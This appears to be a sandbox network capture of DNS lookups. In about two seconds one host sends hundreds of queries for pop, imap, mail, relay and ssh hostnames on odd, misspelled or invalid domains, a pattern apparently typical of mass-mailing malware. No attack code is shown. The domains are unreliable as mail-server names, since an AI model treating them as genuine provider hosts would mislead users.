Nov 30, 2023 11:22:41.486748934 CET	192.168.2.4	1.1.1.1	0x2d71	Standard query (0)	ytcjmiil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.486748934 CET	192.168.2.4	1.1.1.1	0xc19a	Standard query (0)	buromaril.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.489267111 CET	192.168.2.4	1.1.1.1	0xbba6	Standard query (0)	mail.hotmea1aia.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.493267059 CET	192.168.2.4	1.1.1.1	0xc087	Standard query (0)	yahjl.cxs	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.495265007 CET	192.168.2.4	1.1.1.1	0x1f07	Standard query (0)	loaquorezcil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.495265007 CET	192.168.2.4	1.1.1.1	0x9d7d	Standard query (0)	yahgr.neaco	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.602947950 CET	192.168.2.4	1.1.1.1	0xdf87	Standard query (0)	wn26lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.602994919 CET	192.168.2.4	1.1.1.1	0x2047	Standard query (0)	a0i.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.611799955 CET	192.168.2.4	1.1.1.1	0xc204	Standard query (0)	pop.hot13l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.613617897 CET	192.168.2.4	1.1.1.1	0xe735	Standard query (0)	ssh.feoio.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.666304111 CET	192.168.2.4	1.1.1.1	0x34b9	Standard query (0)	mail.gtblil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.667284966 CET	192.168.2.4	1.1.1.1	0xfeca	Standard query (0)	ochcar.cin4g9tdamn.bagcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.667530060 CET	192.168.2.4	1.1.1.1	0xb2b9	Standard query (0)	yahgt.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.676343918 CET	192.168.2.4	1.1.1.1	0x3aff	Standard query (0)	mailgate.wr.omt222lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.676943064 CET	192.168.2.4	1.1.1.1	0xda0e	Standard query (0)	ssh.phcg87k6barre352odseba.dcivenail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.681956053 CET	192.168.2.4	1.1.1.1	0x92b3	Standard query (0)	pop3.yahjl.cxs	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.691293001 CET	192.168.2.4	1.1.1.1	0x3723	Standard query (0)	imap.ee.idbo	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.693645954 CET	192.168.2.4	1.1.1.1	0x13e1	Standard query (0)	ssh.hgaarnlundejl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.698632956 CET	192.168.2.4	1.1.1.1	0x7fcc	Standard query (0)	pop.as.hauet	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.698632956 CET	192.168.2.4	1.1.1.1	0xc097	Standard query (0)	imap.as.r.upze	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.702536106 CET	192.168.2.4	1.1.1.1	0xa04a	Standard query (0)	imap.yahgt.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.711280107 CET	192.168.2.4	1.1.1.1	0x19f8	Standard query (0)	imap.gmaigcmar19l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.711280107 CET	192.168.2.4	1.1.1.1	0x76f8	Standard query (0)	pop.gmdcblil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.711280107 CET	192.168.2.4	1.1.1.1	0xf7fd	Standard query (0)	pop.horadguc1995l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.713345051 CET	192.168.2.4	1.1.1.1	0x63c2	Standard query (0)	mail.yahnt.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.713345051 CET	192.168.2.4	1.1.1.1	0x2d8b	Standard query (0)	ssh.yahe.nen	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.732024908 CET	192.168.2.4	1.1.1.1	0xd000	Standard query (0)	acooil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.835258007 CET	192.168.2.4	1.1.1.1	0xc2be	Standard query (0)	ssh.as.r.upze	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.839121103 CET	192.168.2.4	1.1.1.1	0x8987	Standard query (0)	ssh.cucumbnr.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.839121103 CET	192.168.2.4	1.1.1.1	0xb905	Standard query (0)	pop.f.nyhm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.842624903 CET	192.168.2.4	1.1.1.1	0x49ef	Standard query (0)	pop3.gbivlporollm.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.847410917 CET	192.168.2.4	1.1.1.1	0xc0a5	Standard query (0)	pop.osrniamadvea.lrhzda.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.857521057 CET	192.168.2.4	1.1.1.1	0xe6d8	Standard query (0)	pop.23xd5a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.866885900 CET	192.168.2.4	1.1.1.1	0xbc50	Standard query (0)	imap.zma51baya.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.922970057 CET	192.168.2.4	1.1.1.1	0x867f	Standard query (0)	ssh.rknsieiwn.ail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.922971010 CET	192.168.2.4	1.1.1.1	0x69cc	Standard query (0)	h4y.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.922971010 CET	192.168.2.4	1.1.1.1	0x991	Standard query (0)	ssh.a0i.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.923243999 CET	192.168.2.4	1.1.1.1	0x24db	Standard query (0)	mail.mess.ck	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.927458048 CET	192.168.2.4	1.1.1.1	0x26c0	Standard query (0)	ssh.m0bhfhblezlsl1.co.tv	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.992841005 CET	192.168.2.4	1.1.1.1	0x7fcc	Standard query (0)	pop.as.hauet	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.992841005 CET	192.168.2.4	1.1.1.1	0x76f8	Standard query (0)	pop.gmdcblil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.992841005 CET	192.168.2.4	1.1.1.1	0x2d8b	Standard query (0)	ssh.yahe.nen	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.994740963 CET	192.168.2.4	1.1.1.1	0xe78d	Standard query (0)	pop.syn.lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:41.994740963 CET	192.168.2.4	1.1.1.1	0xc72d	Standard query (0)	pop.gmaigcmar19l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.018788099 CET	192.168.2.4	1.1.1.1	0x4331	Standard query (0)	pop3.yahpn.yb	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.020788908 CET	192.168.2.4	1.1.1.1	0x59e8	Standard query (0)	imap.yahjl.cxs	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.023441076 CET	192.168.2.4	1.1.1.1	0x9a2c	Standard query (0)	relay.h4y.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.023442030 CET	192.168.2.4	1.1.1.1	0x5f02	Standard query (0)	pop.he0114zusmg454lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.048993111 CET	192.168.2.4	1.1.1.1	0xcc0c	Standard query (0)	pop.kni.ol168.ecom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.050630093 CET	192.168.2.4	1.1.1.1	0xeff7	Standard query (0)	ssh.he0114zusmg454lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.062522888 CET	192.168.2.4	1.1.1.1	0xd318	Standard query (0)	pop.7.dceilil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.062757015 CET	192.168.2.4	1.1.1.1	0x72b7	Standard query (0)	pop.s.ddo	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.069268942 CET	192.168.2.4	1.1.1.1	0x4fea	Standard query (0)	pop.loaquorezcil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.071255922 CET	192.168.2.4	1.1.1.1	0xaf3e	Standard query (0)	mailgate.gtblil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.071255922 CET	192.168.2.4	1.1.1.1	0xbb81	Standard query (0)	pop.feoio.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.073267937 CET	192.168.2.4	1.1.1.1	0x9d5f	Standard query (0)	mailgate.a.o.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.194902897 CET	192.168.2.4	1.1.1.1	0x26c0	Standard query (0)	ssh.m0bhfhblezlsl1.co.tv	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.199042082 CET	192.168.2.4	1.1.1.1	0x72d	Standard query (0)	pop.cucumbnr.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.202238083 CET	192.168.2.4	1.1.1.1	0xc6a2	Standard query (0)	pop.jubo.cath	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.202238083 CET	192.168.2.4	1.1.1.1	0x6195	Standard query (0)	pop.qhlil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.204293013 CET	192.168.2.4	1.1.1.1	0x464c	Standard query (0)	pop3.tbsayail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.218925953 CET	192.168.2.4	1.1.1.1	0xf389	Standard query (0)	imap.comcaio.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.221774101 CET	192.168.2.4	1.1.1.1	0x1e43	Standard query (0)	imap.comcaci.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.223468065 CET	192.168.2.4	1.1.1.1	0x184c	Standard query (0)	pop.wn26lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.224050045 CET	192.168.2.4	1.1.1.1	0x77c3	Standard query (0)	pop.qebyte.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.225173950 CET	192.168.2.4	1.1.1.1	0xd757	Standard query (0)	pop.ezi.adompany.at	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.254849911 CET	192.168.2.4	1.1.1.1	0xe78d	Standard query (0)	pop.syn.lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.283546925 CET	192.168.2.4	1.1.1.1	0x9a2c	Standard query (0)	relay.h4y.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.285299063 CET	192.168.2.4	1.1.1.1	0x513d	Standard query (0)	pop.lyco2.comom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.285784006 CET	192.168.2.4	1.1.1.1	0x2008	Standard query (0)	pop.daytonpubhocso.cog	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.431271076 CET	192.168.2.4	1.1.1.1	0x55a4	Standard query (0)	pop.zma51baya.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.431271076 CET	192.168.2.4	1.1.1.1	0xa5c9	Standard query (0)	sbcglob4m.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.462949991 CET	192.168.2.4	1.1.1.1	0x5ef	Standard query (0)	pop3.phcg87k6barre352odseba.dcivenail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.463334084 CET	192.168.2.4	1.1.1.1	0x912e	Standard query (0)	pop.sbcglob4m.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.475265026 CET	192.168.2.4	1.1.1.1	0x9c57	Standard query (0)	pop.yahao.lsa	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.475783110 CET	192.168.2.4	1.1.1.1	0xa029	Standard query (0)	pop.yahwoooie2ampu.comsh	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.476525068 CET	192.168.2.4	1.1.1.1	0xced2	Standard query (0)	pop.ho10a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.476525068 CET	192.168.2.4	1.1.1.1	0x4545	Standard query (0)	pop.hgaarnlundejl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.476525068 CET	192.168.2.4	1.1.1.1	0x51ea	Standard query (0)	pop.yahe.nen	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.489097118 CET	192.168.2.4	1.1.1.1	0xd8d5	Standard query (0)	imap.yahpl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.492453098 CET	192.168.2.4	1.1.1.1	0x796b	Standard query (0)	pop.gmaiuilil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.508831024 CET	192.168.2.4	1.1.1.1	0x84fa	Standard query (0)	pop.asgmaanxgdil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.522695065 CET	192.168.2.4	1.1.1.1	0xe7cc	Standard query (0)	pop.tload.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.525893927 CET	192.168.2.4	1.1.1.1	0x7b42	Standard query (0)	pop.ez786-lcolwicn.coofmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.628592014 CET	192.168.2.4	1.1.1.1	0x4fdf	Standard query (0)	pop.buromaril.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.628870964 CET	192.168.2.4	1.1.1.1	0xad71	Standard query (0)	pop.aomttdl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.633938074 CET	192.168.2.4	1.1.1.1	0xe6d2	Standard query (0)	pop3.yahcl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.634771109 CET	192.168.2.4	1.1.1.1	0x43b5	Standard query (0)	pop.ser711a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.636008978 CET	192.168.2.4	1.1.1.1	0xf0f9	Standard query (0)	pop.geu015naryo-uail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.651321888 CET	192.168.2.4	1.1.1.1	0x9ee2	Standard query (0)	pop.deptka7ffmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.651618958 CET	192.168.2.4	1.1.1.1	0x2caf	Standard query (0)	pop.oa.lagdfillemlmlml00xydurail.jkeziac.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.679135084 CET	192.168.2.4	1.1.1.1	0x369d	Standard query (0)	pop.h4y.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.681302071 CET	192.168.2.4	1.1.1.1	0xd04	Standard query (0)	pop.slyvor.as290a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.681510925 CET	192.168.2.4	1.1.1.1	0x6261	Standard query (0)	pop.gez542l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.681694031 CET	192.168.2.4	1.1.1.1	0xad3	Standard query (0)	pop.hl.comuk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.682029963 CET	192.168.2.4	1.1.1.1	0x5f33	Standard query (0)	pop.e-fja8mso.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.688108921 CET	192.168.2.4	1.1.1.1	0xf29d	Standard query (0)	pop.nnblmogblmoglil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.690896988 CET	192.168.2.4	1.1.1.1	0x505a	Standard query (0)	imap.comcamm.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.706790924 CET	192.168.2.4	1.1.1.1	0x9b28	Standard query (0)	pop.m0bhfhblezlsl1.co.tv	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.710841894 CET	192.168.2.4	1.1.1.1	0xa268	Standard query (0)	pop.comcamm.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.713885069 CET	192.168.2.4	1.1.1.1	0xefb9	Standard query (0)	relay.yahnt.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.772459030 CET	192.168.2.4	1.1.1.1	0x3488	Standard query (0)	pop.sgt9o.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.772772074 CET	192.168.2.4	1.1.1.1	0x7bae	Standard query (0)	pop.ochcar.cin4g9tdamn.bagcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.773255110 CET	192.168.2.4	1.1.1.1	0xb4b1	Standard query (0)	pop.pyctl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.773827076 CET	192.168.2.4	1.1.1.1	0x9e3f	Standard query (0)	pop.rambojoocta.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.774365902 CET	192.168.2.4	1.1.1.1	0xb620	Standard query (0)	pop.domo5ho.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.775140047 CET	192.168.2.4	1.1.1.1	0x4409	Standard query (0)	pop3.comcaio.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.776243925 CET	192.168.2.4	1.1.1.1	0x52b2	Standard query (0)	pop.ytcjmiil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.786993980 CET	192.168.2.4	1.1.1.1	0x683d	Standard query (0)	pop.h2.spainvil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.788275957 CET	192.168.2.4	1.1.1.1	0x616d	Standard query (0)	imap.sbcglob4m.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.788737059 CET	192.168.2.4	1.1.1.1	0xaa35	Standard query (0)	pop.acooil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.788906097 CET	192.168.2.4	1.1.1.1	0x7f29	Standard query (0)	mailgate.he0114zusmg454lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.791681051 CET	192.168.2.4	1.1.1.1	0x533a	Standard query (0)	pop.yahfll.ianus	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.965796947 CET	192.168.2.4	1.1.1.1	0x9ee2	Standard query (0)	pop.deptka7ffmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.966290951 CET	192.168.2.4	1.1.1.1	0x369d	Standard query (0)	pop.h4y.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:42.966384888 CET	192.168.2.4	1.1.1.1	0x9b28	Standard query (0)	pop.m0bhfhblezlsl1.co.tv	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.018867970 CET	192.168.2.4	1.1.1.1	0x9e3f	Standard query (0)	pop.rambojoocta.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.033854961 CET	192.168.2.4	1.1.1.1	0xc67c	Standard query (0)	pop.mn.ch	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.033920050 CET	192.168.2.4	1.1.1.1	0x616d	Standard query (0)	imap.sbcglob4m.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.034059048 CET	192.168.2.4	1.1.1.1	0x683d	Standard query (0)	pop.h2.spainvil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.034307957 CET	192.168.2.4	1.1.1.1	0x6e52	Standard query (0)	pop.a.o.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.035773993 CET	192.168.2.4	1.1.1.1	0xbe9f	Standard query (0)	mailgate.hotmea1aia.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.036340952 CET	192.168.2.4	1.1.1.1	0xd204	Standard query (0)	relay.yahgt.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.037483931 CET	192.168.2.4	1.1.1.1	0xa345	Standard query (0)	pop.yahio.comcm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.038618088 CET	192.168.2.4	1.1.1.1	0xe60e	Standard query (0)	pop.acesineuiw.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.041404963 CET	192.168.2.4	1.1.1.1	0x45b1	Standard query (0)	pop3.caatholiomissa.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.045377970 CET	192.168.2.4	1.1.1.1	0x8d35	Standard query (0)	mail.loaquorezcil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.049309015 CET	192.168.2.4	1.1.1.1	0x1c06	Standard query (0)	mail.zma51baya.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.053277969 CET	192.168.2.4	1.1.1.1	0xe45c	Standard query (0)	pop3.yah23051987hont.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.054020882 CET	192.168.2.4	1.1.1.1	0x9f9a	Standard query (0)	mailgate.getococuail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.054589987 CET	192.168.2.4	1.1.1.1	0xf1c5	Standard query (0)	pop.klp.tn	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.057945967 CET	192.168.2.4	1.1.1.1	0x5190	Standard query (0)	pop.wr.omt222lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.058038950 CET	192.168.2.4	1.1.1.1	0x9ad1	Standard query (0)	mail.z-a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.066549063 CET	192.168.2.4	1.1.1.1	0x7ab6	Standard query (0)	pop.t.ahlfth	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.177436113 CET	192.168.2.4	1.1.1.1	0xa75d	Standard query (0)	mail.caatholiomissa.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.183259964 CET	192.168.2.4	1.1.1.1	0xa7c9	Standard query (0)	pop.n.n.amdiu	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.185288906 CET	192.168.2.4	1.1.1.1	0x3ba8	Standard query (0)	mail.yahgr.neaco	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.186813116 CET	192.168.2.4	1.1.1.1	0xb155	Standard query (0)	pop.asail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.188534975 CET	192.168.2.4	1.1.1.1	0xfbc6	Standard query (0)	pop.e.gr	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.193623066 CET	192.168.2.4	1.1.1.1	0x8a0c	Standard query (0)	mail.yahjl.cxs	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.194143057 CET	192.168.2.4	1.1.1.1	0x7c8d	Standard query (0)	imap.cucumbnr.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.222333908 CET	192.168.2.4	1.1.1.1	0xc25b	Standard query (0)	imap.jubo.cath	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.253601074 CET	192.168.2.4	1.1.1.1	0xa2cc	Standard query (0)	pop.gmai76afmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.253947973 CET	192.168.2.4	1.1.1.1	0x53c5	Standard query (0)	imap.yahpn.yb	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.255740881 CET	192.168.2.4	1.1.1.1	0x1487	Standard query (0)	pop3.h333ol03t8rwslive21lok.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.255798101 CET	192.168.2.4	1.1.1.1	0x5a0e	Standard query (0)	mailgate.ee.idbo	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.255948067 CET	192.168.2.4	1.1.1.1	0x6d52	Standard query (0)	pop3.rhacmtu.au	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.460604906 CET	192.168.2.4	1.1.1.1	0xfbc6	Standard query (0)	pop.e.gr	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.461178064 CET	192.168.2.4	1.1.1.1	0x6b05	Standard query (0)	mailgate.s.ddo	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.470599890 CET	192.168.2.4	1.1.1.1	0x32c	Standard query (0)	mail.yahcl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.478384972 CET	192.168.2.4	1.1.1.1	0xe987	Standard query (0)	pop.il.om	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.479218006 CET	192.168.2.4	1.1.1.1	0xcc2c	Standard query (0)	pop3.yahgr.neaco	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.486279964 CET	192.168.2.4	1.1.1.1	0x4e72	Standard query (0)	imap.ayls.xcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.486280918 CET	192.168.2.4	1.1.1.1	0xb224	Standard query (0)	imap.ser711a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.486280918 CET	192.168.2.4	1.1.1.1	0xf2ec	Standard query (0)	relay.ochcar.cin4g9tdamn.bagcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.505806923 CET	192.168.2.4	1.1.1.1	0xf50c	Standard query (0)	imap.caatholiomissa.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.667254925 CET	192.168.2.4	1.1.1.1	0x4756	Standard query (0)	mail.tbsayail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.675657034 CET	192.168.2.4	1.1.1.1	0xefe9	Standard query (0)	mail.yah23051987hont.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.678611994 CET	192.168.2.4	1.1.1.1	0x8399	Standard query (0)	pop.rknsieiwn.ail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.679276943 CET	192.168.2.4	1.1.1.1	0xdbb9	Standard query (0)	mail.yahgt.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.688191891 CET	192.168.2.4	1.1.1.1	0xe4a1	Standard query (0)	pop3.sbcgloboo.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.688946962 CET	192.168.2.4	1.1.1.1	0x480f	Standard query (0)	pop3.as.r.upze	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.688946962 CET	192.168.2.4	1.1.1.1	0x1647	Standard query (0)	imap.daytonpubhocso.cog	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.690558910 CET	192.168.2.4	1.1.1.1	0x3d8c	Standard query (0)	pop.1rz.ramal.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.690560102 CET	192.168.2.4	1.1.1.1	0x30a9	Standard query (0)	imap.as.hauet	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.698955059 CET	192.168.2.4	1.1.1.1	0x432e	Standard query (0)	pop3.comcaci.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.698956013 CET	192.168.2.4	1.1.1.1	0x9fb6	Standard query (0)	pop3.t-yil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.726610899 CET	192.168.2.4	1.1.1.1	0xf10d	Standard query (0)	mailgate.yahjl.cxs	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.731726885 CET	192.168.2.4	1.1.1.1	0x4766	Standard query (0)	pop.a0i.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.732517004 CET	192.168.2.4	1.1.1.1	0x259c	Standard query (0)	imap.aomttdl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.733081102 CET	192.168.2.4	1.1.1.1	0x398f	Standard query (0)	mailgate.yahcl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.749283075 CET	192.168.2.4	1.1.1.1	0xfcb5	Standard query (0)	imap.il.om	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.750583887 CET	192.168.2.4	1.1.1.1	0x9d7a	Standard query (0)	imap.rknsieiwn.ail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.751235008 CET	192.168.2.4	1.1.1.1	0x15b1	Standard query (0)	pop3.hot13l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.853929043 CET	192.168.2.4	1.1.1.1	0x9191	Standard query (0)	pop3.7.dceilil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.881222963 CET	192.168.2.4	1.1.1.1	0x7b36	Standard query (0)	pop3.s.ddo	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.881222963 CET	192.168.2.4	1.1.1.1	0x1030	Standard query (0)	imap.rhacmtu.au	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.882204056 CET	192.168.2.4	1.1.1.1	0x3ac9	Standard query (0)	pop3.he0114zusmg454lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.891211987 CET	192.168.2.4	1.1.1.1	0x95d	Standard query (0)	pop3.horadguc1995l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:43.891211987 CET	192.168.2.4	1.1.1.1	0x64be	Standard query (0)	mail.he0114zusmg454lil.com	A (IP address)	IN (0x0001)	false
